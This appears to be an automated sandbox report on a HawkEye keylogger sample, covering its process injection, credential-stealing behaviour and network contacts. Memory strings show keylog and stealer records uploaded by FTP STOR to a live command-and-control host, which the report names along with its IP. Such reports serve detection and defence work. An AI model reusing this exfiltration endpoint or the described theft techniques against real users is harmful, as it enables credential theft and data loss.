                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Source: InstallUtil.exe, 00000010.00000002.486099792.0000000001285000.00000004.00000020.sdmp, String found in binary or memory: /HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmp, String found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmp, String found in binary or memory: l\ftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmp, String found in binary or memory: ftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_632922%208.10.2021%204:55:54%20PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmp, String found in binary or memory: lbftp://ftp.badonfashoin.com/HawkEye_Keylogger_Stealer_Records_632922%208.10.2021%204:55:54%20PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494199612.0000000003484000.00000004.00000001.sdmp, String found in binary or memory: lAHawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txtP
                  Source: InstallUtil.exe, 00000010.00000002.494199612.0000000003484000.00000004.00000001.sdmp, String found in binary or memory: lHSTOR HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.494199612.0000000003484000.00000004.00000001.sdmp, String found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                  Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, String found in binary or memory: HawkEyeKeylogger
                  Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, String found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
                  Source: InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, String found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                  Source: InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                  Yara detected HawkEye Keylogger
                  Source: Yara match, File source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  The matrix is listed here by tactic (one column of the original table per entry, cells in their original order; the digits that follow a technique are the report's own cell annotations):

                  Initial Access: Replication Through Removable Media 1; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
                  Execution: Windows Management Instrumentation 1; Native API 1; Shared Modules 1; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
                  Persistence: Application Shimming 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
                  Privilege Escalation: Application Shimming 1; Process Injection 312; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
                  Defense Evasion: Disable or Modify Tools 1; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 1; Masquerading 1; Virtualization/Sandbox Evasion 21; Process Injection 312; Hidden Files and Directories 2; Masquerading; Invalid Code Signature; Right-to-Left Override; Rename System Utilities
                  Credential Access: OS Credential Dumping 1; Input Capture 1; Credentials in Registry 2; Credentials In Files 1; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
                  Discovery: System Time Discovery 1; Peripheral Device Discovery 1; Account Discovery 1; File and Directory Discovery 1; System Information Discovery 18; Query Registry 1; Security Software Discovery 31; Virtualization/Sandbox Evasion 21; Process Discovery 4; Application Window Discovery 1; System Owner/User Discovery 1; Remote System Discovery 1
                  Lateral Movement: Replication Through Removable Media 1; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
                  Collection: Archive Collected Data 1; Data from Local System 1; Email Collection 1; Input Capture 1; Clipboard Data 1; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
                  Exfiltration: Exfiltration Over Alternative Protocol 1; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
                  Command and Control: Encrypted Channel 12; Non-Standard Port 1; Remote Access Software 1; Non-Application Layer Protocol 1; Application Layer Protocol 12; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                  Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                  Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                  Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                  Behavior Graph

                  Behavior Graph ID: 462697; Sample: FukQGQj7cl; Start date: 10/08/2021; Architecture: WINDOWS; Score: 100

                  Signatures on the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

                  Process tree recovered from the graph:

                  FukQGQj7cl.exe (started)
                    DNS/IP: www.google.com 142.250.185.196, port 443, local port 49715, GOOGLEUS, United States
                    Dropped: C:\Users\user\AppData\...\InstallUtil.exe (PE32); C:\Users\user\AppData\...\FukQGQj7cl.exe.log (ASCII)
                    Signatures: Writes to foreign memory regions; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
                    -> InstallUtil.exe (started)
                      DNS/IP: ftp.badonfashoin.com 45.141.152.18, port 21, local ports 49745 and 49746, M247GB, Romania; 90.168.9.0.in-addr.arpa
                      Signatures: Changes the view of files in windows explorer (hidden files and folders); Writes to foreign memory regions; Sample uses process hollowing technique; Injects a PE file into a foreign processes
                      -> vbc.exe (started, first instance)
                        Signatures: Tries to steal Mail credentials (via file registry); Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)
                      -> vbc.exe (started, second instance)
                        DNS/IP: 192.168.2.1 unknown unknown
                        Signatures: Tries to harvest and steal browser information (history, passwords, etc)


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label | Link
                  FukQGQj7cl.exe | 46% | Virustotal | | Browse
                  FukQGQj7cl.exe | 36% | ReversingLabs | Win32.Trojan.Sabsik |
                  FukQGQj7cl.exe | 100% | Joe Sandbox ML | |

                  Dropped Files

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\InstallUtil.exe | 0% | Metadefender | | Browse
                  C:\Users\user\AppData\Local\Temp\InstallUtil.exe | 0% | ReversingLabs | |

                  Unpacked PE Files

                  Source | Detection | Scanner | Label | Link | Download
                  16.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac | | Download File
                  16.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473 | | Download File
                  1.2.FukQGQj7cl.exe.4ac319a.11.unpack | 100% | Avira | TR/Inject.vcoldi | | Download File
                  22.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1125438 | | Download File
                  1.2.FukQGQj7cl.exe.48ba66a.6.unpack | 100% | Avira | TR/Inject.vcoldi | | Download File

                  Domains

                  Source | Detection | Scanner | Label | Link
                  ftp.badonfashoin.com | 1% | Virustotal | | Browse

                  URLs

                  Source | Detection | Scanner | Label | Link
                  http://ns.adobe.cobj2A | 0% | Avira URL Cloud | safe |
                  http://crl.pki.goog/gsr1/gsr1.crl0; | 0% | URL Reputation | safe |
                  http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
                  http://crls.pki.goog/gts1c3/moVDfISia2k.crl0 | 0% | Avira URL Cloud | safe |
                  http://fontfabrik.comB | 0% | Avira URL Cloud | safe |
                  http://www.tiro.comsUKAi | 0% | Avira URL Cloud | safe |
                  http://www.tiro.com | 0% | URL Reputation | safe |
                  http://ns.adobe.c/g | 0% | URL Reputation | safe |
                  http://www.goodfont.co.kr | 0% | URL Reputation | safe |
                  http://www.carterandcone.com | 0% | URL Reputation | safe |
                  http://pki.goog/repo/certs/gtsr1.der04 | 0% | URL Reputation | safe |
                  http://www.sajatypeworks.com | 0% | URL Reputation | safe |
                  http://www.typography.netD | 0% | URL Reputation | safe |
                  http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
                  http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
                  http://fontfabrik.com | 0% | URL Reputation | safe |
                  http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
                  http://www.sandoll.co.kr | 0% | URL Reputation | safe |
                  http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
                  http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
                  http://www.sakkal.com | 0% | URL Reputation | safe |
                  http://www.tiro.comWUgA | 0% | Avira URL Cloud | safe |
                  http://www.tiro.comEUuA | 0% | Avira URL Cloud | safe |
                  http://fontfabrik.comsUKAi | 0% | Avira URL Cloud | safe |
                  http://ns.adobe.c/g2A | 0% | Avira URL Cloud | safe |
                  http://www.fonts.comcNUlA( | 0% | Avira URL Cloud | safe |
                  http://ns.adobe.cobj | 0% | URL Reputation | safe |
                  http://crl.pki.goog/gtsr1/gtsr1.crl0W | 0% | URL Reputation | safe |
                  http://www.fonts.comicXU | 0% | Avira URL Cloud | safe |
                  http://www.carterandcone.comLP | 0% | Avira URL Cloud | safe |
                  http://pki.goog/gsr1/gsr1.crt02 | 0% | URL Reputation | safe |
                  https://pki.goog/repository/0 | 0% | URL Reputation | safe |
                  http://www.carterandcone.coml | 0% | URL Reputation | safe |
                  http://ftp.badonfashoin.com | 0% | Avira URL Cloud | safe |
                  http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
                  http://ns.ado/12A | 0% | Avira URL Cloud | safe |
                  http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
                  http://www.tiro.comcomEUuA | 0% | Avira URL Cloud | safe |
                  http://ns.ado/1 | 0% | URL Reputation | safe |
                  http://pki.goog/repo/certs/gts1c3.der0 | 0% | URL Reputation | safe |

                  Domains and IPs

                  Contacted Domains

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  ftp.badonfashoin.com | 45.141.152.18 | true | true | | unknown
                  www.google.com | 142.250.185.196 | true | false | | high
                  90.168.9.0.in-addr.arpa | unknown | unknown | false | | unknown

                      URLs from Memory and Binaries

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://ns.adobe.cobj2A | FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.fontbureau.com/designersG | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://crl.pki.goog/gsr1/gsr1.crl0; | FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers/? | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://www.founder.com.cn/cn/bThe | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers? | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://crls.pki.goog/gts1c3/moVDfISia2k.crl0 | FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                  http://fontfabrik.comB | InstallUtil.exe, 00000010.00000003.314578251.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.tiro.comsUKAi | InstallUtil.exe, 00000010.00000003.315611989.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.tiro.com | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.315759111.00000000061EB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp, InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmp | false | | high
                  http://ns.adobe.c/g | FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.goodfont.co.kr | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.carterandcone.com | InstallUtil.exe, 00000010.00000003.319806893.00000000061E9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers/cabarga.htmln-us | InstallUtil.exe, 00000010.00000003.329177139.000000000620A000.00000004.00000001.sdmp | false | | high
                  http://schema.org/WebPage | FukQGQj7cl.exe, 00000001.00000002.312563898.0000000002ECF000.00000004.00000001.sdmp | false | | high
                  http://pki.goog/repo/certs/gtsr1.der04 | FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                  http://www.sajatypeworks.com | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.typography.netD | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  https://www.google.com | FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmp | false | | high
                  http://www.founder.com.cn/cn/cThe | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.galapagosdesign.com/staff/dennis.htm | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://fontfabrik.com | InstallUtil.exe, 00000010.00000003.314395304.00000000061EB000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designersd | InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmp | false | | high
                  http://whatismyipaddress.com/- | FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp | false | | high
                  http://www.galapagosdesign.com/DPlease | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  https://login.yahoo.com/config/login | vbc.exe | false | | high
                  http://www.fonts.com | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://www.sandoll.co.kr | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.site.com/logs.php | InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp | false | | high
                  http://www.urwpp.deDPlease | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.nirsoft.net/ | vbc.exe, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp | false | | high
                  http://www.zhongyicts.com.cn | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp | false | | high
                  http://www.sakkal.com | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.tiro.comWUgA | InstallUtil.exe, 00000010.00000003.315250712.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.tiro.comEUuA | InstallUtil.exe, 00000010.00000003.315478837.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://fontfabrik.comsUKAi | InstallUtil.exe, 00000010.00000003.314280047.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://ns.adobe.c/g2A | FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.apache.org/licenses/LICENSE-2.0 | InstallUtil.exe, 00000010.00000003.319415666.00000000061E8000.00000004.00000001.sdmp | false | | high
                  http://www.fontbureau.com | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://www.fonts.comcNUlA( | InstallUtil.exe, 00000010.00000003.313190214.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                  http://ns.adobe.cobj | FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://crl.pki.goog/gtsr1/gtsr1.crl0W | FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                  http://www.fonts.comicXU | InstallUtil.exe, 00000010.00000003.313322897.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.carterandcone.comLP | InstallUtil.exe, 00000010.00000003.320005338.00000000061E7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://pki.goog/gsr1/gsr1.crt02 | FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                  https://pki.goog/repository/0 | FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
                  http://www.carterandcone.coml | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers/cabarga.htmlN | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://ftp.badonfashoin.com | InstallUtil.exe, 00000010.00000002.494142383.0000000003476000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.founder.com.cn/cn | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers/frere-jones.html | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://ns.ado/12A | FukQGQj7cl.exe, 00000001.00000003.230610513.000000000994A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.jiyu-kobo.co.jp/ | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers8 | InstallUtil.exe, 00000010.00000002.498309994.00000000062C0000.00000002.00000001.sdmp | false | | high
                  http://www.tiro.comcomEUuA | InstallUtil.exe, 00000010.00000003.315832509.00000000061EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe |
                                                            unknown
                                                            https://www.google.com/accounts/serviceloginvbc.exefalse
                                                              high
                                                              http://www.fontbureau.com/designers/InstallUtil.exe, 00000010.00000003.326807641.00000000061DE000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://www.google.com/FukQGQj7cl.exe, 00000001.00000002.312280965.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://ns.ado/1FukQGQj7cl.exe, 00000001.00000003.306427088.0000000009950000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://pki.goog/repo/certs/gts1c3.der0FukQGQj7cl.exe, 00000001.00000002.310372719.00000000013A2000.00000004.00000020.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown

                                                                  Contacted IPs


                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.196 | www.google.com | United States | 15169 | GOOGLEUS | false
45.141.152.18 | ftp.badonfashoin.com | Romania | 9009 | M247GB | true

                                                                  Private

                                                                  IP
                                                                  192.168.2.1

                                                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 462697
Start date: 10.08.2021
Start time: 16:46:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: FukQGQj7cl (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 5.2% (good quality ratio 5%)
• Quality average: 85%
• Quality standard deviation: 24.2%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.182.143.212, 23.211.6.115, 52.168.117.173, 131.253.33.200, 13.107.22.200, 204.79.197.200, 13.107.21.200, 23.211.4.86, 20.82.210.154, 205.185.216.42, 205.185.216.10, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

Time | Type | Description
16:47:08 | API Interceptor | 218x Sleep call for process: FukQGQj7cl.exe modified
16:47:58 | API Interceptor | 5x Sleep call for process: InstallUtil.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

Match | Associated Sample Name / URL | Detection | Context
45.141.152.18 | Confirmarea platii.pdf.exe | malicious | alfawood.us/xsclk/index.php
45.141.152.18 | Confirmarea platii.pdf.exe | malicious | alfawood.us/mkdgs/index.php
45.141.152.18 | e-dekont.html.exe | malicious | alfawood.us/mkdgs/index.php
45.141.152.18 | Credit Advice -TT6635993652908.PDF.exe | malicious | alfawood.us/mkdgs/index.php
45.141.152.18 | Dekont.pdf.exe | malicious | alfawood.us/xsclk/index.php
45.141.152.18 | Dekont.pdf.exe | malicious | blkgrupdoom.info/scgn/index.php
45.141.152.18 | e-dekont.html.exe | malicious | blkgrupdoom.info/scgn/index.php
45.141.152.18 | Dekont.pdf.exe | malicious | blkgrupdoom.info/scgn/index.php

                                                                  Domains

Match | Associated Sample Name / URL | Detection | Context
ftp.badonfashoin.com | New Updated 20210810.doc | malicious | 45.141.152.18
ftp.badonfashoin.com | 82658.exe | malicious | 45.141.152.18
